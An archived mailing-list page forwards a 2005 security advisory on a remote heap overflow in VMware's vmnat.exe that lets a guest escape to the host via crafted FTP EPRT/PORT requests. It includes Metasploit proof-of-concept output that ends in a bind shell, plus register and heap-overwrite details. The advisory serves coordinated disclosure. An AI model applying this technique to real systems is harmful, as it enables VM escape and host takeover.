Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Security-Advisories@acs-inc.com: [Full-disclosure] [ACSSEC-2005-11-25-0

from [Andrew Griffiths] Network Security [Permanent Link]
Subject: [Security-Advisories@acs-inc.com: [Full-disclosure] [ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0 <= build-18007 G SX Server Variants And Others]
Date: Wed, 21 Dec 2005 10:12:21 +0000 
Requested by the author. 

----- Forwarded message from Security Advisories 
<Security-Advisories@acs-inc.com> -----

From: Security Advisories <Security-Advisories@acs-inc.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
        full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] [ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0
        <= build-18007 G SX Server Variants And Others



-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - Remote Heap Overflow

ID:       ACSSEC-2005-11-25 - 0x1

Class:    Remote Heap Overflow
Package:  VMWare Workstation 5.5.0 <= build-18007
            VMWare GSX Server Variants
            VMWare Ace Variants
            VMWare Player Variants
Exempt:   VMWare ESX Server Variants
Build:    Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 21, 2005

Remote:   Yes
Severity: High

Credit:   Tim Shelton           <security-advisories@acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

-=[ Background

"VMware Workstation is powerful desktop virtualization software for software
developers/testers and enterprise IT professionals that runs multiple
operating systems simultaneously on a single PC. Users can run Windows,
Linux, NetWare, or Solaris x86 in fully networked, portable virtual machines
- no rebooting or hard drive partitioning required. VMware Workstation
delivers excellent performance and advanced features such as memory
optimization and the ability to manage multi-tier configurations and
multiple snapshots.

With millions of customers and dozens of major product awards over the last
six years, VMware Workstation is a proven technology that improves
productivity and flexibility. An indispensable tool for software developers
and IT professionals worldwide."

                        -- http://www.vmware.com/products/ws/



-=[ Technical Description

A vulnerability was identified in VMware Workstation (And others) vmnat.exe,
which could be exploited by remote attackers to execute arbitrary commands.
This vulnerability allows the escape from a VMware Virtual Machine into
userland space and compromising the host. 

'Vmnat' is unable to process specially crafted 'EPRT' and 'PORT' FTP
Requests.  



-=[ Proof of Concept:
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

msf > use vmware_vmnat
msf vmware_vmnat(win32_bind) > exploit
[*] Starting Bind Handler.
[*] VMWare vmnat Remote Heap Exploit by Tim Shelton <security@acs-inc.com>
[*] 220 #### FTP Server Ready.
[*] Login as anonymous/login
[*] Sending evil buffer....
[*] No response from FTP server
[*] Exiting Bind Handler.
vmnat.exe: Access violation when writing to [2F5C2F5C] <- Controllable
Registers

-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

-=[ Breakdown 

Control over registers ECX, EDI, EBX will allow you overwrite an available 
Heap Header PLINK and FLINK.  

EDX points to your buffer on overwrite.

Overwrite located at ntdll.0x7C926A36 Windows XP/SP2 build 2600

-=[ Functioning Overflow of Concept:
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

msf > use vmware_vmnat_0day
msf vmware_vmnat_0day(win32_bind) > exploit
[*] Starting Bind Handler.
[*] VMWare vmnat Remote Heap Exploit 0day by Tim Shelton
<security@acs-inc.com>
[*] 220 #### FTP Server Ready.
[*] Login as anonymous/login
[*] Sending evil buffer....
[*] Got connection from 192.168.79.130:34941 <-> 192.168.79.2:4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\VMware Workstation>

-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-


-=[ Credits

Vulnerability originally reported and exploited by Tim Shelton


-=[ ChangeLog

2005-11-25 : Original Advisory
2005-12-01 : Notified Vendor
2005-12-20 : Vendor released patch, disclosing full information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

----- End forwarded message -----
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Security-Advisories@acs-inc.com: [Full-disclosure] [ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0 <= build-18007 G SX Server Variants And Others], Andrew Griffiths <=
Previous by Date:  [ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2, the_day@echo.or.id
Next by Date:  mIRC buffer overflow, Crowdat Kurobudetsu
Previous by Thread:  Tolva PHP website system Remote File Include, beford
Next by Thread:  mIRC buffer overflow, Crowdat Kurobudetsu
Indexes:  [Date] [Thread] [Top] [All Lists]